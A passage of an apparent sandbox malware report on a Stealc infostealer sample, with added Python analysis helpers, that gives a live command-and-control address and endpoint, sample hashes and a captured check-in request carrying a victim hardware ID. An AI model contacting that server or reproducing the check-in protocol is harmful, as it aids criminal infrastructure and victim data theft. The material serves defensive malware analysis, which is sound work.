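            if langid_from_hkl(h) in BLOCKED_LANGIDS]


def utc(year: int, month: int, day: int) -> datetime:
    """Helper so callers can build UTC timestamps without importing datetime."""
    return datetime(year, month, day, tzinfo=timezone.utc)


def parse_expiry(text: str) -> datetime:
    """sscanf-style parse of an embedded 'YYYY-MM-DD' string (format assumed).
    A malformed string raises, which is what a failed sscanf would amount to."""
    year, month, day = (int(part) for part in text.split("-"))
    return utc(year, month, day)


def expired(expiry_text: str, now: datetime) -> bool:
    """GetSystemTime, convert both sides to a comparable value, compare."""
    return now >= parse_expiry(expiry_text)


def exit_reasons(hkls, expiry_text: str, now: datetime) -> list:
    """Empty list means 'run'; otherwise the reasons the sample would ExitProcess."""
    reasons = []
    hits = blocked_layouts(hkls)
    if hits:
        reasons.append("blocked keyboard layout: " + ", ".join(hits))
    if expired(expiry_text, now):
        reasons.append("past embedded expiry " + expiry_text)
    return reasons


if __name__ == "__main__":
    # Constructed inputs: en-US plus ru-RU layouts, and a clock one day past the expiry.
    print(exit_reasons([0x04090409, 0x04190419], "2024-09-29", utc(2024, 9, 30)))
```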

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1371291825.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7640, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1371291825.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7640, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK techniques mapped by the signatures above (reconstructed from the matrix; the number in parentheses is the count the matrix attaches to each technique, and matrix cells without a count were not observed):

Execution: Command and Scripting Interpreter (2), Native API (11)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (11), DLL Side-Loading (1)
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (4), Software Packing (12), DLL Side-Loading (1)
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12)
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact: no technique observed
Source | Detection | Scanner | Label
file.exe | 42% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.php; | file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php5 | file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpu | file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpX | file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpg | file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
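The memory-string URLs listed above carry one or two trailing bytes after .php (`;`, `5`, `u`, `X`, `g`), which is what a string scanner picks up when a URL sits next to other data in memory, while only two of the listed URLs carry a reputation verdict. The Python below is an added example of folding such variants into a deduplicated, defanged IOC list; it is not part of the report, the input list is constructed from the lines above, and treating the short suffixes as adjacent bytes rather than as distinct endpoints is an assumption the code encodes (a candidate it cannot fold, such as /ws, is kept and flagged for review rather than dropped). Query strings are deliberately left intact, since a `?` after .php is part of the URL.

```python
"""Fold memory-string URL variants into a deduplicated, defanged IOC list.
Added example for this report, not part of it."""
import re

# Constructed input: the URL strings the report lists from process memory,
# copied with the trailing bytes the string scanner attached to them.
MEMORY_URLS = [
    "http://185.215.113.37/e2b1563c6670f193.php;",
    "http://185.215.113.37",
    "http://185.215.113.37/e2b1563c6670f193.php5",
    "http://185.215.113.37/e2b1563c6670f193.phpu",
    "http://185.215.113.37/ws",
    "http://185.215.113.37/e2b1563c6670f193.phpX",
    "http://185.215.113.37/e2b1563c6670f193.phpg",
]

# URLs that carry a reputation verdict in the report (constructed from the table above).
CONFIRMED = {
    "http://185.215.113.37/",
    "http://185.215.113.37/e2b1563c6670f193.php",
}

# Assumption: up to two characters after ".php" that are not a path, query or
# fragment delimiter are adjacent memory bytes, not part of the URL.
# "?id=1"-style query strings are left alone because '?' is excluded.
TRAILING_JUNK = re.compile(r"(\.php)[^/?#]{1,2}$")


def normalize(url: str) -> str:
    """Strip the trailing junk and surrounding whitespace; keep everything else."""
    return TRAILING_JUNK.sub(r"\1", url.strip())


def defang(url: str) -> str:
    """Make the indicator safe to paste: hxxp scheme and bracketed host dots.
    Path dots are left alone so the endpoint name stays searchable."""
    scheme, rest = url.split("://", 1)
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def is_confirmed(url: str, confirmed: set) -> bool:
    """A bare host is the same indicator as the host with a trailing slash."""
    return url in confirmed or url + "/" in confirmed or url.rstrip("/") in confirmed


def triage(memory_urls, confirmed) -> dict:
    """Group raw strings by their normalized form and mark which ones have a verdict."""
    groups = {}
    for raw in memory_urls:
        groups.setdefault(normalize(raw), []).append(raw)
    return {
        url: {"variants": raws, "confirmed": is_confirmed(url, confirmed)}
        for url, raws in groups.items()
    }


def ioc_lines(result: dict) -> list:
    """One defanged line per indicator, unconfirmed ones flagged for review."""
    lines = []
    for url in sorted(result):
        info = result[url]
        status = "confirmed" if info["confirmed"] else "UNCONFIRMED, review"
        lines.append(f"{defang(url)}  ({status}; {len(info['variants'])} memory string(s))")
    return lines


if __name__ == "__main__":
    for line in ioc_lines(triage(MEMORY_URLS, CONFIRMED)):
        print(line)
```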
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522760
Start date and time: 2024-09-30 16:31:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 81%
• Number of executed functions: 20
• Number of non-executed functions: 86
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• VT rate limit hit for: file.exe
                            No simulations
IP context for 185.215.113.37 (other Joe Sandbox submissions that contacted it; columns: sample name, detection, threat name, context):
• file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
• file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
• file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
• file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
• file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
• file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
• 4qIl08vrFY.exe | malicious | Amadey, Stealc | 185.215.113.37/e2b1563c6670f193.php
• file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
• file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
• file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
No context
ASN context for WHOLESALECONNECTIONSNL (other Joe Sandbox submissions that contacted this ASN; columns: sample name, detection, threat name, context):
• file.exe | malicious | Stealc, Vidar | 185.215.113.37
• file.exe | malicious | Stealc | 185.215.113.37
• file.exe | malicious | Stealc | 185.215.113.37
• file.exe | malicious | Stealc, Vidar | 185.215.113.37
• file.exe | malicious | Stealc | 185.215.113.37
• file.exe | malicious | Stealc | 185.215.113.37
• 4qIl08vrFY.exe | malicious | Amadey, Stealc | 185.215.113.103
• file.exe | malicious | Stealc, Vidar | 185.215.113.37
• file.exe | malicious | Stealc | 185.215.113.37
• file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            No context
                            No context
                            No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.949616985181135
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'846'272 bytes
MD5: e9912f8bbba8a435c0770c5cb9dbdee2
SHA1: f323b850b002137ec47f291d928378245d4670fe
SHA256: f53185e3b9046b1c522d14dfed5988e0b4096cd5302e13a0d3e77207e014d797
SHA512: 640a900f0655c839df55eb130270e1dad80a1a9ac60796c816d330156fdf48e3495acbf643d777c647868714c54b653386109cd6e3ceb49126f04eeb6ecee9e8
SSDEEP: 49152:wdg0ihASkGCxyd3OqAl4aiQn0JNNyT+qrfNSqmL:wRNG2ycRiQ0JNN50NST
TLSH: 1885331B6B4AD07CF5759D7DAD126CD86FF4C9783FB1638ABC2D365DBA3024001298A2
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xaa5000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                             Entrypoint preview (first instruction at 0xaa5000):
                             jmp 00007F5E98DB28DAh
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
                             Name | Virtual Address | Virtual Size | Is in Section
                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                             (no name) | 0x1000 | 0x25b000 | 0x22800 | b216b02c7acba77814495535efbacac9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             (no name) | 0x25e000 | 0x2a9000 | 0x200 | 21d4d1ef6cfc2472c07f87a924b1ccd9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             ceyxbmwp | 0x507000 | 0x19d000 | 0x19ca00 | f00f507ef83f0361c59202148969f6fb | False | 0.9950204483489852 | data | 7.955340871068763 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             arpaejxu | 0x6a4000 | 0x1000 | 0x400 | 9d6978de847da33de1f0176ec63ea5a0 | False | 0.7978515625 | data | 6.239485481484981 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .taggant | 0x6a5000 | 0x3000 | 0x2200 | b22a3f41f67555fb0fcee129053b0a3e | False | 0.006548713235294118 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             DLL | Import
                             kernel32.dll | lstrcpy
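The section table above is the usual packer profile: the entry point (0xaa5000, RVA 0x6a5000) sits in `.taggant` rather than `.text`, every executable section is mapped read/write/execute, two sections carry no name, the 1.6 MB `ceyxbmwp` section has entropy 7.96, and the import table holds a single entry (lstrcpy). The script below is an added example, not part of the Joe Sandbox report, that parses a PE32 section table with only the Python standard library and flags those indicators. To run offline it builds a synthetic PE header that copies the section names, RVAs, virtual sizes, characteristics, entry point and image base from the table above; the raw section bytes are filler (not the sample's contents), so the entropy figures it prints are those of the filler.

```python
import math
import struct

# IMAGE_SCN_* characteristic bits from the PE/COFF specification.
SCN_FLAGS = {
    0x00000020: "CNT_CODE",
    0x00000040: "CNT_INITIALIZED_DATA",
    0x00000080: "CNT_UNINITIALIZED_DATA",
    0x20000000: "MEM_EXECUTE",
    0x40000000: "MEM_READ",
    0x80000000: "MEM_WRITE",
}
CODE_SECTION_NAMES = {".text", "CODE", ".code"}  # where a normal linker puts the entry point


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty data, 8.0 when every byte value is equally frequent."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe32(pe: bytes) -> dict:
    """Read the COFF header, PE32 optional header and section table of a PE32 image."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images handled here")
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    image_base = struct.unpack_from("<I", pe, opt + 28)[0]
    sections = []
    for i in range(n_sections):
        # IMAGE_SECTION_HEADER is 40 bytes: name, VirtualSize, VirtualAddress, SizeOfRawData,
        # PointerToRawData, two pointers, two counts, Characteristics.
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "va": va, "vsize": vsize, "raw_size": raw_size,
            "flags": [n for bit, n in SCN_FLAGS.items() if chars & bit],
            "entropy": shannon_entropy(raw),
        })
    return {"entry_rva": entry_rva, "image_base": image_base, "sections": sections}


def triage(pe: bytes) -> dict:
    """Packer heuristics: entry-point section, RWX mappings, unnamed sections, random-looking data."""
    info = parse_pe32(pe)
    entry_section = None
    for s in info["sections"]:
        if s["va"] <= info["entry_rva"] < s["va"] + max(s["vsize"], s["raw_size"]):
            entry_section = s["name"] or "<unnamed>"
            break
    rwx = [s["name"] or "<unnamed>" for s in info["sections"]
           if {"MEM_EXECUTE", "MEM_READ", "MEM_WRITE"} <= set(s["flags"])]
    unnamed = sum(1 for s in info["sections"] if not s["name"])
    entry_va = info["image_base"] + info["entry_rva"]
    findings = []
    if entry_section not in CODE_SECTION_NAMES:
        findings.append(f"entry point 0x{entry_va:x} lies in {entry_section!r}, not a standard code section")
    if rwx:
        findings.append("writable+executable sections: " + ", ".join(rwx))
    if unnamed:
        findings.append(f"{unnamed} section(s) without a name")
    for s in info["sections"]:
        if s["entropy"] > 7.0:
            findings.append(f"section {s['name'] or '<unnamed>'} entropy {s['entropy']:.2f}: packed or encrypted payload likely")
    return {"entry_section": entry_section, "entry_va": entry_va, "rwx_sections": rwx,
            "unnamed_sections": unnamed, "sections": info["sections"], "findings": findings}


def build_sample_pe() -> bytes:
    """Synthetic PE32 whose headers mirror the section table in the report above.
    Raw section contents are filler chosen to show the entropy check, not the sample's bytes."""
    rwx = 0x40 | 0x20000000 | 0x40000000 | 0x80000000
    rw = 0x40 | 0x40000000 | 0x80000000
    high = bytes(range(256)) * 2  # every byte value twice: entropy 8.0
    low = b"\x00" * 512           # constant filler: entropy 0.0
    layout = [  # (name, VirtualAddress, VirtualSize, Characteristics, raw filler)
        (b"", 0x1000, 0x25b000, rwx, low),
        (b".rsrc", 0x25c000, 0x1000, rw, b""),
        (b".idata", 0x25d000, 0x1000, rw, low),
        (b"", 0x25e000, 0x2a9000, rwx, low),
        (b"ceyxbmwp", 0x507000, 0x19d000, rwx, high),
        (b"arpaejxu", 0x6a4000, 0x1000, rwx, low),
        (b".taggant", 0x6a5000, 0x3000, rwx, low),
    ]
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0x66F99A4A, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<I", opt, 16, 0x6a5000)                 # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                 # ImageBase
    headers, raw, ptr = bytearray(), bytearray(), 0x400
    for name, va, vsize, chars, data in layout:
        headers += struct.pack("<8sIIIIIIHHI", name, vsize, va, len(data), ptr if data else 0, 0, 0, 0, 0, chars)
        raw += data
        ptr += len(data)
    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(headers)).ljust(0x400, b"\0") + bytes(raw)


if __name__ == "__main__":
    for line in triage(build_sample_pe())["findings"]:
        print(line)
```

Running it on the synthetic image reports the same four indicators the table above shows for the real sample. To use it on the actual file, replace `build_sample_pe()` with `open("file.exe", "rb").read()`; the entropy column will then reflect the real section bytes.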
                             Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                             2024-09-30T16:32:04.742514+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.9 | 49706 | 185.215.113.37 | 80 | TCP
                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                             Sep 30, 2024 16:32:03.595516920 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                             Sep 30, 2024 16:32:03.789464951 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                             Sep 30, 2024 16:32:03.789587975 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                             Sep 30, 2024 16:32:03.790220976 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                             Sep 30, 2024 16:32:03.795480013 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                             Sep 30, 2024 16:32:04.506990910 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                             Sep 30, 2024 16:32:04.507098913 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                             Sep 30, 2024 16:32:04.510941982 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                             Sep 30, 2024 16:32:04.517230988 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                             Sep 30, 2024 16:32:04.742451906 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
                             Sep 30, 2024 16:32:04.742513895 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                             Sep 30, 2024 16:32:06.969997883 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
                            • 185.215.113.37
                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                             0 | 192.168.2.9 | 49706 | 185.215.113.37 | 80 | 7640 | C:\Users\user\Desktop\file.exe
                             Timestamp | Bytes transferred | Direction | Data
                             Sep 30, 2024 16:32:03.790220976 CEST | 89 | OUT
                             GET / HTTP/1.1
                             Host: 185.215.113.37
                             Connection: Keep-Alive
                             Cache-Control: no-cache
                             Sep 30, 2024 16:32:04.506990910 CEST | 203 | IN
                             HTTP/1.1 200 OK
                             Date: Mon, 30 Sep 2024 14:32:04 GMT
                             Server: Apache/2.4.52 (Ubuntu)
                             Content-Length: 0
                             Keep-Alive: timeout=5, max=100
                             Connection: Keep-Alive
                             Content-Type: text/html; charset=UTF-8
                             Sep 30, 2024 16:32:04.510941982 CEST | 412 | OUT
                             POST /e2b1563c6670f193.php HTTP/1.1
                             Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAK
                             Host: 185.215.113.37
                             Content-Length: 211
                             Connection: Keep-Alive
                             Cache-Control: no-cache
                             Data Raw: 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 37 43 45 30 30 32 37 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 2d 2d 0d 0a
                             Data Ascii (CRLF line endings shown as line breaks; 211 bytes, matching Content-Length):
                             ------HDHJEBFBFHJECAKFCAAK
                             Content-Disposition: form-data; name="hwid"

                             477CE00270C53528003197
                             ------HDHJEBFBFHJECAKFCAAK
                             Content-Disposition: form-data; name="build"

                             doma
                             ------HDHJEBFBFHJECAKFCAAK--
                             Sep 30, 2024 16:32:04.742451906 CEST | 210 | IN
                             HTTP/1.1 200 OK
                             Date: Mon, 30 Sep 2024 14:32:04 GMT
                             Server: Apache/2.4.52 (Ubuntu)
                             Content-Length: 8
                             Keep-Alive: timeout=5, max=99
                             Connection: Keep-Alive
                             Content-Type: text/html; charset=UTF-8
                             Data Raw: 59 6d 78 76 59 32 73 3d
                             Data Ascii: YmxvY2s= (base64; decodes to the ASCII string "block")
                             The check-in sends the victim hardware ID (hwid) and the build tag (build=doma) as multipart form fields to the PHP endpoint; the server answers with base64 "YmxvY2s=", i.e. "block", and no further HTTP exchange follows in this capture.
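The two requests above are the Stealc check-in as captured: a bare GET / followed by a multipart POST to /e2b1563c6670f193.php carrying the hwid and build fields, answered with an 8-byte base64 reply. The script below is an added example, not part of the report, that reconstructs the captured POST body from the decoded dump, parses the multipart fields with a minimal RFC 7578 splitter and decodes the base64 reply; it assumes nothing beyond the headers and bytes shown in the capture. One detail worth checking when writing such a parser: the boundary in Content-Type is `----HDHJEBFBFHJECAKFCAAK`, and every delimiter in the body is that boundary prefixed with `--`, so splitting on the Content-Type value alone leaves stray dashes on each part.

```python
import base64
import re

# Values copied from the capture above.
POST_CONTENT_TYPE = "multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAK"
POST_CONTENT_LENGTH = 211
RESPONSE_BODY = b"YmxvY2s="

# The POST body, reconstructed from the "Data Ascii" dump with its CRLF line endings
# restored (the flattened dump drops them); the trailing "" yields the final CRLF.
POST_BODY = b"\r\n".join([
    b"------HDHJEBFBFHJECAKFCAAK",
    b'Content-Disposition: form-data; name="hwid"',
    b"",
    b"477CE00270C53528003197",
    b"------HDHJEBFBFHJECAKFCAAK",
    b'Content-Disposition: form-data; name="build"',
    b"",
    b"doma",
    b"------HDHJEBFBFHJECAKFCAAK--",
    b"",
])


def boundary_from_content_type(content_type: str) -> bytes:
    """Extract the boundary parameter; the body delimiter is this value prefixed with '--'."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(1).encode("ascii")


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Return {field name: raw value bytes} for a multipart/form-data body."""
    delimiter = b"--" + boundary_from_content_type(content_type)
    fields = {}
    # Everything before the first delimiter is a preamble and is ignored.
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter ("--boundary--"): done
            break
        if not chunk.startswith(b"\r\n"):
            raise ValueError("delimiter not followed by CRLF")
        head, sep, value = chunk[2:].partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part has no header/body separator")
        m = re.search(rb'name="([^"]*)"', head)
        if not m:
            raise ValueError("part has no field name")
        # A part's value ends with the CRLF that precedes the next delimiter.
        if not value.endswith(b"\r\n"):
            raise ValueError("part value not terminated by CRLF")
        fields[m.group(1).decode("ascii")] = value[:-2]
    return fields


def decode_c2_reply(body: bytes) -> str:
    """The check-in reply is plain base64; strict decoding rejects anything else."""
    return base64.b64decode(body, validate=True).decode("ascii")


def checkin_summary(content_type: str, content_length: int, body: bytes, reply: bytes) -> dict:
    """Cross-check Content-Length against the body, then pull out the fields and the reply."""
    if len(body) != content_length:
        raise ValueError(f"Content-Length {content_length} does not match body length {len(body)}")
    fields = parse_multipart(content_type, body)
    return {
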